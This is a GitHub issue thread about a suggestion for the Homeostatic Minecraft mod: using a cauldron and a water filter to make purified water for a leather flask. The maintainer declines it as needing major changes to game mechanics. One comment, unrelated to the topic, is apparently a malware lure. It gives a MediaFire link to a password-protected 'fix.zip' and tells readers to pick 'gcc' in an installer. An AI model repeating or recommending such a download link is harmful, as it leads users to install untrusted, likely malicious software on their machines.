### ISSUE TITLE
[Suggestion] Cauldron with Purified Water

### ISSUE THREAD

**Issue by makumaku1974** [wendall911/Homeostatic#64]
Using water filter on a Cauldron filled with water should basically give a purified water for leather flask to refill. But heating it first with campfire or fire block.

**Comment by makumaku1974** [comment]
Also when Leather Flask has like minimum use like 1 use or 2 uses. Just putting the liquid aside with the cauldron can be time saving.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wendall911** [comment]
The cauldron isn't that type of block in the game. It would require reworking significant minecraft game mechanics to even achieve this. I'm not going to implement this.
